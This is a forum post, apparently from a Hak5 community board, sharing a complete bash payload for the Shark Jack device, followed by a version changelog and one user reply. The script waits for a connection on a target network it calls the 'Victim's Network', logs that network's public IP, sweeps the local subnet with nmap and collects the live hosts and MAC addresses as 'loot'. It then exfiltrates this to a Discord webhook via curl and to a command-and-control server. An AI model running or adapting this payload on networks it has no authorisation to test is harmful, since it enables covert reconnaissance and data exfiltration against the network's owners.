Jump to content

[PAYLOAD] Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled)


Recommended Posts

Nmap Quickscan
with Discord Integration
(Cleaned & C2 Enabled)

This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, It scans the local subnet for any online devices. - While also logging the Public IP of the Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.)

payload.sh
 

#!/bin/bash
# Title:         Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled)
# Author:        REDD of Private-Locker
# Version:       1.3
#
# This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. 
# The Payload waits for "Internet Connection" to be present. Once Internet Connection is found,
# It scans the local subnet for any online devices. - While also logging the Public IP of the
# Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.)
#
# Magenta w/ Yellow ........Waiting for Internet
# 1st Yellow flashing.......Scanning for Gateway/Subnet
# Cyan flashing.............Running Nmap scan on x.0/24
# 2nd Yellow Flashing.......Installing dependencies for Discord Integration
# Yellow....................Sent to Discord Webhook
# Blue......................Exfiltrating to C2
# Red.......................Failed C2/EXFIL/Scanning
# Green.....................Finished

# Turn on Discord Integration (Yes = 1, No = 0)
DISCORD=0
WEBHOOK='PLACE_DISCORD_WEBHOOK_HERE'
# Send Loot as File or Plain Messages (File = 1, Messages = 0)
AS_FILE=0

if [ -f "/etc/device.config" ]; then
        INITIALIZED=1
else
        INITIALIZED=0
fi
LED SETUP
NETMODE DHCP_CLIENT
while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done
URL="http://www.example.com"
while ! wget $URL -qO /dev/null; do sleep 1; done
GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}')
while [ $GET_GATEWAY == "" ]; do sleep 1; done
INTERNAL_IP=$(ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')
SUBNET=$(echo "$GET_GATEWAY" | awk -F"." '{print $1"."$2"."$3".0/24"}')
CHK_SUB=$(echo $INTERNAL_IP | cut -d"." -f1-3)
FIN_SUB="${CHK_SUB}.0/24"
LED ATTACK;
if [ "$SUBNET" != "$FIN_SUB" ]; then
        LED R FAST;
        sleep 2;
        LED R SOLID;
else
        # Fix for Timestamp Update
        ntpd -gq; sleep 1;
        DATE_FORMAT=$(date '+%m-%d-%Y_%H:%M:%S')
        LOOT_DIR="/root/loot/nmap-diag"
        LOOT_FILE="$LOOT_DIR/diag-${DATE_FORMAT}.txt"
        if [ ! -d "$LOOT_DIR" ]; then
                mkdir -p "$LOOT_DIR"
        fi
        if [ ! -f "$LOOT_FILE" ]; then
                touch "$LOOT_FILE"
        fi
        # Get Public IP and run NMAP scan
        PUBLIC_IP=$(wget -q "http://api.ipify.org" -O -)
        printf "\n       Public IP: ${PUBLIC_IP}\n    Online Devices for ${SUBNET}:\n--------------------------------------------\n\n" >> "$LOOT_FILE"
        LED C VERYFAST
		run_nmap () {
                nmap -sn --privileged "$SUBNET" --exclude "$INTERNAL_IP" | awk '/Nmap scan report for/{printf " -> ";printf $5;}/MAC Address:/{print " - "substr($0, index($0,$3)) }' >> "$LOOT_FILE"
				
        }
        run_nmap &
        PID=$!
                while kill -0 "$PID" 2>&1 >/dev/null; do
                        wait $PID
                done
        if [ -s "$LOOT_FILE" ]; then
				if [ "$DISCORD" == 1 ]; then
						CURL_CHK=$(which curl)
						if [ "$CURL_CHK" != "/usr/bin/curl" ]; then
							LED Y VERYFAST;
							opkg update;opkg install libcurl curl;
						fi
						LED Y SOLID
						if [ "$AS_FILE" == 1 ]; then
							FILE=\"$LOOT_FILE\"
							curl -s -i -H 'Content-Type: multipart/form-data' -F FILE=@$FILE -F 'payload_json={ "wait": true, "content": "Loot has arrived!", "username": "SharkJack" }' $WEBHOOK
						fi
						if [ "$AS_FILE" == 0 ]; then
							while read -r line; do
								DISCORD_MSG=\"**$line**\"
								curl -H "Content-Type: application/json" -X POST -d "{\"content\": $DISCORD_MSG}"  $WEBHOOK
							done < "$LOOT_FILE"
						fi
						LED G SOLID;sleep 2;
				fi
                if [ "$INITIALIZED" == 1 ]; then
						LED Y SOLID
                        if [ -z "$(pgrep cc-client)" ]; then
                                C2CONNECT
                                while ! pgrep cc-client; do LED B SOLID;sleep .2;LED G SOLID;sleep .8; done
                        fi
						# Re-issuing C2CONNECT to verify loot push to C2
						C2CONNECT
						sleep 2
                        C2EXFIL STRING "${LOOT_FILE}" "Nmap Diagnostic for Network ${SUBNET}"
                        LED M VERYFAST;
                        sleep 2;
                fi
                LED FINISH;
        else
                LED R SOLID;
                rm -rf "$LOOT_FILE";
        fi
fi

 

Edited by REDD
1.3
  • Upvote 1
Link to post
Share on other sites

Version 1.3 (Jan 23rd 2021):

  • Added Discord Webhook Integration to the Payload as a alternate source of acquiring loot from the SharkJack.
  • Added Optional "send as file" or "send as plain text messages" to the payload.


Version 1.2 (Jan 22nd 2021):

  • Fixed Errors with C2CONNECT and EXFIL not working correctly as intended in script.
  • Added forced wait until nmap finished to look for loot.
  • Cleaned up script process.

 

Edited by REDD
Link to post
Share on other sites
  • REDD changed the title to [PAYLOAD] Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled)
  • 2 weeks later...
47 minutes ago, SKiZZ said:

I'll have to give this a try tonight as all your other addons are spot on and have used them for pentest engaements.

If you try to add this with the Web UI, it wont work.. You'll have to follow the "Workaround" for adding this Payload into the Payload Library.. It contains characters the "Payload" tab doesn't like..  Lol

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...